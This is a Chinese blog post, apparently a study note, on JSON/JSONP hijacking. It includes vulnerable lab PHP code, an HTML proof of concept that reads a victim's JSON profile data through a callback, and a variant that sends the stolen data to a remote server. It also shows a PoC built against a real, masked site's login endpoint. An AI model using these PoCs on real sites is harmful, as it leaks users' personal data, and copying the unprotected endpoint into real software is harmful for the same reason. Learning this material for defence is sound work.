json劫持学习

已于 2022-06-24 17:37:44 修改
阅读量741 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: json php
于 2021-10-12 22:15:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/120590605
本文介绍了JSON劫持的概念,这是一种利用类似CSRF的手段获取敏感数据的攻击方式。当Web应用以JSON形式返回敏感数据并仅依赖cookie验证时,攻击者可能发起攻击。文章通过靶场练习展示了如何利用POC获取JSON信息,并分享了实际测试中遇到的一个接口案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

JSON劫持

json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。

一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。

靶场练习

在这里插入图片描述
json漏洞代码

<?php
	include "../class/function.class.php";
	$reqMethod = "GET";
	$reqValue = "callback";
	$p = new Func($reqMethod, $reqValue);
	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => 'admin@gh0st.cn', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	if(!@$_GET['callback']){
		echo $p -> con_function('json_encode',$info);
	}else{
		$callback = htmlspecialchars($_GET['callback']);
		echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")";
	}
?>

POC

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>json劫持</title>
</head>
<body>
    <script>
    function vulkey(data)
    {
        alert(JSON.stringify(data));
        }
        </script>
<script src="http://localhost/DoraBox-master/csrf/jsonp.php?callback=vulkey">
</script>
</body>
</html>

将上面poc保存成html文件,点击
在这里插入图片描述
可以看到成功将json信息带出来了
如下poc可以将json信息发送到远端服务器

<html>
<head>
    <title>txf</title>
<script>
	var xmlhttp;
    function txf(a)
    {
    xmlhttp=new XMLHttpRequest()
	var x="http://***.***.***/json.php?name="+a.data.name;
	xmlhttp.open("GET", x, true);
	xmlhttp.send();
	}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
</html>

实中的一次测试

发现一接口
http://******.com/klogin/request/login.ashx?act=json&jsonp=showUser&jsoncallback=
在这里插入图片描述
构造poc

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>json劫持</title>
</head>
<body>
    <script>
    function v(data)
    {
        alert(JSON.stringify(data));
        }
        </script>
<script src="http://****.com/klogin/request/login.ashx?act=json&jsonp=v">
</script>
</body>
</html>

在这里插入图片描述

前端领域JSON数据的加密与解密
前端视界的博客
04-06 1290
随着Web应用的复杂性不断增加,前端数据安全问题日益突出。JSON作为前后端通信的主要数据格式,其安全性直接关系到整个应用的安全。本文旨在为前端开发者提供一套完整的JSON数据加密与解密解决方案,涵盖从基础理论到实际应用的各个方面。前端数据安全的基本概念常见加密算法在前端的应用JSON数据的加密与解密实现性能与安全的平衡策略实际应用场景分析首先介绍背景知识和核心概念然后深入探讨加密算法原理接着提供实际代码实现最后讨论应用场景和未来趋势。
同源策略——CORS和JSONP劫持漏洞
m0_61506558的博客
11-03 921
同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。如果两个URL拥有相同的协议(http、https)、端口和主机,那么这两个URL就是同源的。JSONP(JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。JSONP实现跨域请求的原理简单的说,就是动态创建标签,然后利用的 src不受。
JSON劫持攻击[汇总]
浪子燕青的博客
02-25 3077
title: JSON劫持攻击[汇总] copyright: true top: 0 date: 2018-08-14 09:58:52 tags: JSON劫持 categories: 渗透测试 permalink: password: keywords: description: JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取。 你感觉到了吗?我的血液是热的,可我的心是冷的 JSON 劫持又为“ JSON Hijacking ”,最开始提出这个概念大概是在 2008 年国外有安全研究人.
JSON劫持
m0_51822230的博客
04-25 1573
【技术工场】“JSON劫持漏洞”分析 2019-05-29 17:30 // 转载 前 言 JSON(Java Object Notation) 是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器解析和生成。 JSON采用完全独立于语言的文本格式,但是也使用了类似于C语言家族的习惯。这些特性使JSON成为理想的数据交换语言。 这种纯文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,但是如果这种交互的方式用来传递敏感的数据,并且传输的时
深入理解XSS与JSON劫持攻击及防护策略
最新发布
weixin_42510201的博客
05-01 207
本文深入探讨了XSS(跨站脚本攻击)和JSON劫持攻击的原理、手法及其防御策略。通过分析具体案例,揭示了攻击者如何绕过反XSRF(跨站请求伪造)防御机制,并利用JSON劫持获取敏感数据。同时,文章也探讨了会话固定漏洞的成因和发现方法,并提出了相应的防御措施。
json劫持
buptisc_txy的专栏
12-19 1228
竟然会有这个。估计很多地方都没不会注意这个。 文章来源:http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx 道理大约说下。黑客在自己的页面中重定义了array函数。然后利用了 When you visit the page, you will see the following alert dialog…
JSON hijacking
jvisualvm
04-01 320
原创转载请注明出处:http://agilestyle.iteye.com/blog/2367009   Issue JSON劫持利用一些浏览器的功能,允许脚本覆盖核心语言的对象setter的例程,它允许恶意JavaScript插入逻辑,使其监控服务器返回的JSON消息。   在一个JSON劫持攻击中,攻击者将覆盖的JavaScript数组传递给它的构造函数来窃取信息。攻击者然后嵌入...
json劫持攻击
mgxcool的专栏
06-11 6322
攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,像目标服务器发送请求,以获得敏感数据。 攻击者可以在虚假页面中,加入如下标签: 加入www.bank.com/userinf
101.网络安全渗透测试—[常规漏洞挖掘与利用篇17]—[json劫持漏洞与测试]
m0_67265464的博客
02-24 5956
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、json劫持漏洞概念 (1)json劫持概念 (2)json劫持攻击 二、json劫持漏洞测试 (1)json劫持漏洞测试流程与方法 (2)json漏洞页面源码:`json.php` (3)测试json.php是否存在漏洞:`json-poc.html` (4)劫持json数据,发送给远程服务器 一、json劫持漏洞概念 (1)json劫持概念 JSON是一种轻量级的数据交换格式,而劫持
详解JSONJSONP劫持以及解决方法.docx
01-22
"详解JSONJSONP劫持以及解决方法" 本文主要介绍了JSONJSONP劫持的概念...本文旨在帮助读者深入理解JSON劫持JSONP劫持的概念、攻击过程、解决方法,以及实例代码,希望能够对大家的学习和工作产生实质性的帮助。
JSON Hijacking的利用
tenfyguo的技术专栏
11-21 3675
<br />from:http://www.7747.net/Article/200812/30705.html<br /> <br /> <br />JSON Hijacking有什么作用,正如黑哥所说,可以CSRF得到用户隐私数据:)。<br />原理最后介绍,先来看个攻击例子,拿饭否来做个实验。首先我们看这:<a href="http://help.fanfou.com/api.html" target="_blank">http://help.fanfou.com/api.html</a>。饭否的A
详解JSONJSONP劫持以及解决方法
10-17
主要介绍了详解JSONJSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
jsonp劫持
m0_51553670的博客
07-29 1739
JSON指的是JavaScript对象表示法( JavaScript Object Notation)JSON是轻量级的文本数据交换格式JSON是存储和交换文本信息的语法,类似XML但JSON比XML更小、更快、更易解析C、Python、C++、Java、PHP、Go等编程语言都支持JSON几乎所有编程语言都有解析JSON的库,而在JavaScript中,我们可以直接使用JSON,因为JavaScript内置了JSON的解析。
JSON Hijacking
weixin_34337265的博客
12-04 135
A while back I wrote abouta subtle JSON vulnerabilitywhich could result in the disclosure of sensitive information. That particular exploit involved overriding the JavaScriptArrayconst...
Jsonp劫持
Sentiment的博客
07-25 1175
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
JSON劫持与while(1)
分享不一样的技术,与你一起共同成长!
04-25 693
JSON 劫持,也称为“JavaScript 对象表示不法劫持”。当应用程序没有适当地防范此类攻击时,此漏洞允许攻击者从受害者的浏览器中窃取敏感数据。JSON 劫持利用同源策略,这是一种安全措施,可防止网页向与提供网页的域不同的域发出请求。这是通过查询资料找到关于什么"JSON劫持"的解释.这个JSON劫持一般发生与JSONP、CSRF跨站伪造请求有点异曲同工之处...
JSON劫持漏洞分析
Fly_鹏程万里
05-17 5657
什么是JSON劫持单从字面上就可以理解的出来,JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取(或者应该称为打劫、拦截比较合适。恶意攻击者通过某些特定的手段,将本应该返回给用户的JSON数据进行拦截,转而将数据发送回给恶意攻击者,这就是JSON劫持的大概含义。一般来说进行劫持JSON数据都是包含敏感信息或者有价值的数据。造成JSON劫持漏洞的成因正所谓无风不起浪,无根不长草,要发动一...
Json hijacking/Json劫持漏洞
weixin_33712987的博客
01-22 364
0x00 相关背景介绍JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999的一个子集。 JSON采用完全独立于语言的文本格式,但是...
web前端安全性——JSONP劫持
qq_53911056的博客
02-22 1751
JSONP劫持的防护 (1)限制referer 前端可以通过设置document.referrer属性来限制Referer。虽然这并不能阻止攻击者伪造Referer,但可以增加一层防护。 (2)使用token 在前端,你可以通过添加一个自定义的token参数来增强JSONP请求的安全性。
理解JSONJSONP劫持及防范措施
当一个Web应用将敏感信息以JSON格式返回给客户端时,如果没有采取足够的安全措施,攻击者可以通过模拟合法请求来获取这些数据,从而实施JSON劫持攻击。这种攻击类似于CSRF(跨站请求伪造),但其目的不是触发操作,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值